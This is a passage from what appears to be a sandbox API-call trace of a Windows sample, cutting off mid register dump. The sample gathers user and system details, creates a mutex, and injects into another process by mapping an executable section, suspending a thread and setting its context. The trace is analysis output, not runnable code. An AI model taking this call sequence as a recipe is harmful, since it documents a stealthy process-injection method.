BaseAddress=0xdea44*=0x0, ZeroBits=0x0, RegionSize=0xdea48*=0x28c00, AllocationType=0x3000, Protect=0x4 | out: BaseAddress=0xdea44*=0x4d0000, RegionSize=0xdea48*=0x29000) returned 0x0 [0284.449] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x2000) returned 0x5df190 [0284.450] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0xde788 | out: TokenHandle=0xde788*=0xc0) returned 0x0 [0284.450] NtQueryInformationToken (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0xddf80, TokenInformationLength=0x400, ReturnLength=0xde780 | out: TokenInformation=0xddf80, ReturnLength=0xde780) returned 0x0 [0284.450] ConvertSidToStringSidW (in: Sid=0xddf88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)), StringSid=0xde784 | out: StringSid=0xde784*="S-1-5-21-1560258661-3990802383-1811730007-1000") returned 1 [0284.450] NtClose (Handle=0xc0) returned 0x0 [0284.450] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xde9f8*=0x0, ZeroBits=0x0, RegionSize=0xde9fc*=0x8f636, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0xde9f8*=0x500000, RegionSize=0xde9fc*=0x90000) returned 0x0 [0284.453] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xde9e4*=0x0, ZeroBits=0x0, RegionSize=0xde9e8*=0x8f636, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0xde9e4*=0xab0000, RegionSize=0xde9e8*=0x90000) returned 0x0 [0284.461] RtlFreeHeap (HeapHandle=0x590000, Flags=0x0, BaseAddress=0x5df190) returned 1 [0284.461] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x1000) returned 0x5df190 [0284.461] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0xb40000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.462] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0xb40000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0xb40000, ResultLength=0x0) returned 0xc0000004 [0284.464] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0xb40000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.464] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0xb40000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.464] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0xb40000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0xb40000, ResultLength=0x0) returned 0x0 [0284.467] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0xde110 | out: Value="RDhJ0CNFevzX") returned 0x0 [0284.467] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="APPDATA", Value=0xde47c | out: Value="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0284.467] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="APPDATA", Value=0xde46c | out: Value="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0284.467] NtCreateSection (in: SectionHandle=0xdfabc, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0xde494, SectionPageProtection=0x4, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0xdfabc*=0xc0) returned 0x0 [0284.468] NtMapViewOfSection (in: SectionHandle=0xc0, ProcessHandle=0xffffffff, BaseAddress=0xdfab8*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde494*=0x1b58000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0xdfab8*=0x6460000, SectionOffset=0x0, ViewSize=0xde494*=0x1b58000) returned 0x0 [0284.469] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x4000) returned 0x5e0198 [0284.476] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0xddc2c | out: TokenHandle=0xddc2c*=0xc4) returned 0x0 [0284.476] NtQueryInformationToken (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0xdd424, TokenInformationLength=0x400, ReturnLength=0xddc24 | out: TokenInformation=0xdd424, ReturnLength=0xddc24) returned 0x0 [0284.476] ConvertSidToStringSidW (in: Sid=0xdd42c*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)), StringSid=0xddc28 | out: StringSid=0xddc28*="S-1-5-21-1560258661-3990802383-1811730007-1000") returned 1 [0284.476] NtClose (Handle=0xc4) returned 0x0 [0284.487] RtlIntegerToChar (in: Value=0x88c53315, Base=0x10, Length=0x20, String=0x646a4a9 | out: String="88C53315") returned 0x0 [0284.488] NtCreateKey (in: KeyHandle=0xde6a0, DesiredAccess=0x20219, ObjectAttributes=0xddc2c*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\Machine\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde6a0*=0xc4) returned 0x0 [0284.493] NtQueryValueKey (in: KeyHandle=0xc4, ValueName="ProductName", KeyValueInformationClass=0x1, KeyValueInformation=0xde278, Length=0x100, ResultLength=0xde6f4 | out: KeyValueInformation=0xde278*(TitleIndex=0x0, Type=0x1, DataOffset=0x30, DataLength=0x1e, NameLength=0x16, Name="ProductName", Data="Windows 10 Pro"), ResultLength=0xde6f4) returned 0x0 [0284.493] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xddc5c*=0x0, ZeroBits=0x0, RegionSize=0xddc60*=0x1f4400, AllocationType=0x3000, Protect=0x4 | out: BaseAddress=0xddc5c*=0x7fc0000, RegionSize=0xddc60*=0x1f5000) returned 0x0 [0284.493] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xddc48*=0x0, ZeroBits=0x0, RegionSize=0xddc4c*=0x1f4400, AllocationType=0x3000, Protect=0x4 | out: BaseAddress=0xddc48*=0x81c0000, RegionSize=0xddc4c*=0x1f5000) returned 0x0 [0284.494] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="TEMP", Value=0xddc4c | out: Value="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 0x0 [0284.494] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="ProgramFiles", Value=0xddc14 | out: Value="C:\\Program Files (x86)") returned 0x0 [0284.530] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x12d5a9, lpParameter=0xdf2e0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xc8 [0284.531] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x4000) returned 0x5e41a0 [0284.533] NtOpenDirectoryObject (in: FileHandle=0xde48c, DesiredAccess=0x2000f, ObjectAttributes=0xde458*(Length=0x18, RootDirectory=0x0, ObjectName="\\BaseNamedObjects", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0) | out: FileHandle=0xde48c*=0xcc) returned 0x0 [0284.533] NtCreateMutant (in: MutantHandle=0xde710, DesiredAccess=0x1f0001, ObjectAttributes=0xde440*(Length=0x18, RootDirectory=0xcc, ObjectName="3N5NT194G6EF0HB0", Attributes=0x80, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), InitialOwner=0 | out: MutantHandle=0xde710*=0xd0) returned 0x0 [0284.533] NtClose (Handle=0xcc) returned 0x0 [0284.536] NtOpenProcess (in: ProcessHandle=0xdea74, DesiredAccess=0x438, ObjectAttributes=0xdea3c*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xdea54*(UniqueProcess=0x67c, UniqueThread=0x0) | out: ProcessHandle=0xdea74*=0xcc) returned 0x0 [0284.536] NtQueryInformationProcess (in: ProcessHandle=0xcc, ProcessInformationClass=0x1a, ProcessInformation=0xdea64, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0xdea64, ReturnLength=0x0) returned 0x0 [0284.536] NtMapViewOfSection (in: SectionHandle=0xc0, ProcessHandle=0xcc, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xdea5c*=0x1b58000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0xdea60*=0xe4a0000, SectionOffset=0x0, ViewSize=0xdea5c*=0x1b58000) returned 0x0 [0284.538] NtClose (Handle=0xcc) returned 0x0 [0284.582] NtDelayExecution (Alertable=0, Interval=0xde6bc*=-50000000) returned 0x0 [0289.640] NtOpenProcess (in: ProcessHandle=0xde678, DesiredAccess=0x438, ObjectAttributes=0xddc28*(Length=0x30, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xddc68*(UniqueProcess=0x67c, UniqueThread=0x0) | out: ProcessHandle=0xde678*=0x128) returned 0x0 [0289.656] NtQueryInformationProcess (in: ProcessHandle=0x128, ProcessInformationClass=0x0, ProcessInformation=0xddc78, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xddc78, ReturnLength=0x0) returned 0x0 [0289.663] NtOpenThread (in: ThreadHandle=0xddc20, DesiredAccess=0x1a, ObjectAttributes=0xddc28, ClientId=0xddc58*(UniqueProcess=0x0, UniqueThread=0x680) | out: ThreadHandle=0xddc20*=0x12c) returned 0x0 [0289.668] NtSuspendThread (in: ThreadHandle=0x12c, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0289.674] NtGetContextThread (in: ThreadHandle=0x12c, Context=0xde170 | out: Context=0xde170*(ContextFlags=0x0, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x10000b, FloatSave.DataSelector=0x1fa0, FloatSave.RegisterArea=([0]=0x33, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x2b, [11]=0x0, [12]=0x46, [13]=0x2, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x1, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0xd4, [73]=0x1e, [74]=0xf3, [75]=0xab, [76]=0xfd, [77]=0x7f, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x564a00, SegEs=0x0, SegDs=0xcfa98, Edi=0x0, Esi=0xcfb10, Ebx=0x0, Edx=0x0, Ecx=0x0, Eax=0xffffffff, Ebp=0x0, Eip=0xcfa58, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x46, [5]=0x2, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0xe8, [21]=0xa7, [22]=0x99, [23]=0xaa, [24]=0xfd, [25]=0x7f, [26]=0x0, [27]=0x0, [28]=0xd0, [29]=0x20, [30]=0x56, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0xa0, [37]=0xda, [38]=0x2f, [39]=0xaa, [40]=0xfd, [41]=0x7f, [42]=0x0, [43]=0x0, [44]=0x34, [45]=0x20, [46]=0xf3, [47]=0xab, [48]=0xfd, [49]=0x7f, [50]=0x0, [51]=0x0, [52]=0x7f, [53]=0x2, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0xa0, [77]=0x1f, [78]=0x0, [79]=0x0, [80]=0xff, [81]=0xff, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0289.693] NtCreateSection (in: SectionHandle=0xddc00, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0xddba0, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0xddc00*=0x130) returned 0x0 [0289.696] NtMapViewOfSection (in: SectionHandle=0x130, ProcessHandle=0x128, BaseAddress=0xddc08*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xddba8*=0xa1636, InheritDisposition=0x7ffd00000001, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xddc08*=0x7d00000, SectionOffset=0x0, ViewSize=0xddba8*=0xa2000) returned 0x0 [0289.700] NtMapViewOfSection (in: SectionHandle=0x130, ProcessHandle=0xffffffffffffffff, BaseAddress=0xddbf8*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xddba8*=0xa2000, InheritDisposition=0x7ffd00000001, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xddbf8*=0x6040000, SectionOffset=0x0, ViewSize=0xddba8*=0xa2000) returned 0x0 [0289.761] NtUnmapViewOfSection (ProcessHandle=0xffffffffffffffff, BaseAddress=0x6040000) returned 0x0 [0289.778] NtClose (Handle=0x130) returned 0x0 [0289.784] NtSetContextThread (ThreadHandle=0x12c, Context=0xde170*(ContextFlags=0x0, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x10000b, FloatSave.DataSelector=0x1fa0, FloatSave.RegisterArea=([0]=0x33, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x2b, [11]=0x0, [12]=0x46, [13]=0x2, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x1, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0xd4, [73]=0x1e, [74]=0xf3, [75]=0xab, [76]=0xfd, [77]=0x7f, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x564a00, SegEs=0x0, SegDs=0xcfa98, Edi=0x0, Esi=0xcfb10, Ebx=0x0, Edx=0x0, Ecx=0x0, Eax=0xffffffff, Ebp=0x0, Eip=0xcfa58, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x46, [5]=0x2, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0xe8, [21]=0xa7, [22]=0x99, [23]=0xaa, [24]=0xfd, [25]=0x7f, [26]=0x0, [27]=0x0, [28]=0xd0, [29]=0x20, [30]=0x56, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0xa0, [37]=0xda, [38]=0x2f, [39]=0xaa, [40]=0xfd, [41]=0x7f, [42]=0x0, [43]=0x0, [44]=0xe5, [45]=0xc8, [46]=0xd1, [47]=0x7, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x7f, [53]=0x2, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0xa0, [77]=0x1f, [78]=0x0, [79]=0x0, [80]=0xff, [81]=0xff, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, 